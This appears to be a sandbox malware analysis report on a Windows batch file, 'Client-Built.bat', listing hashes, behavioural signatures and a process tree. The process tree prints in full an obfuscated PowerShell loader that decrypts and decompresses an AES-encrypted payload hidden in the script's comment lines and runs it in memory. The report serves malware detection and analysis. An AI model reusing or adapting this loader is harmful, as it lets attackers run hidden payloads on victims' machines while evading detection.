Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
19-10-2024 18:25
Static task
static1
Behavioral task
behavioral1
Sample
Client-Built.bat
Resource
win7-20240708-en
windows7-x64
6 signatures
150 seconds
General
-
Target
Client-Built.bat
-
Size
309KB
-
MD5
779ea367cf71bed6a1f3b78a48d7c3fd
-
SHA1
a8a6caee309e724367a686ab9da2a65f3522eba0
-
SHA256
53666bd18a4e85ff72aac790ea41f603e3d0ce78d12a22bfcdb2e46d1f1d4afd
-
SHA512
8e54f78210ec383fd24e2fe0bc0beb2d0aad0536443fe88e5f8f10959913bd66000d6448219f3137589c707c85a5e3cac3b03d6fb68cc942543ee51f1e5faa94
-
SSDEEP
6144:L3pboxHrffvx5qjFakMpbeZuwRLfktxH44ScYQafuqzyFhSd90:LxOrfOupiRLQScYLfuDFs90
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Deletes itself 1 IoCs
Processes:
cmd.exepid process 1892 cmd.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2756 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2756 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
cmd.exenet.exedescription pid process target process PID 1892 wrote to memory of 2612 1892 cmd.exe net.exe PID 1892 wrote to memory of 2612 1892 cmd.exe net.exe PID 1892 wrote to memory of 2612 1892 cmd.exe net.exe PID 2612 wrote to memory of 2648 2612 net.exe net1.exe PID 2612 wrote to memory of 2648 2612 net.exe net1.exe PID 2612 wrote to memory of 2648 2612 net.exe net1.exe PID 1892 wrote to memory of 2756 1892 cmd.exe powershell.exe PID 1892 wrote to memory of 2756 1892 cmd.exe powershell.exe PID 1892 wrote to memory of 2756 1892 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Client-Built.bat"1⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:1892 -
C:\Windows\system32\net.exenet file2⤵
- Suspicious use of WriteProcessMemory
PID:2612 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file3⤵PID:2648
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yhQ3heawMyvGHcN/HVfcC9bTWPMTkS0JHj1mcOoLd0g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Q3EOLjVuYmh+6EyzRS0NrQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vXQbB=New-Object System.IO.MemoryStream(,$param_var); $AUvTu=New-Object System.IO.MemoryStream; $tCRmZ=New-Object System.IO.Compression.GZipStream($vXQbB, [IO.Compression.CompressionMode]::Decompress); $tCRmZ.CopyTo($AUvTu); $tCRmZ.Dispose(); $vXQbB.Dispose(); $AUvTu.Dispose(); $AUvTu.ToArray();}function execute_function($param_var,$param2_var){ $oYOpP=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $FcSFc=$oYOpP.EntryPoint; $FcSFc.Invoke($null, $param2_var);}$lXRaI = 'C:\Users\Admin\AppData\Local\Temp\Client-Built.bat';$host.UI.RawUI.WindowTitle = $lXRaI;$enbFg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($lXRaI).Split([Environment]::NewLine);foreach ($huNIz in $enbFg) { if ($huNIz.StartsWith(':: ')) { $GZJMV=$huNIz.Substring(3); break; }}$payloads_var=[string[]]$GZJMV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2756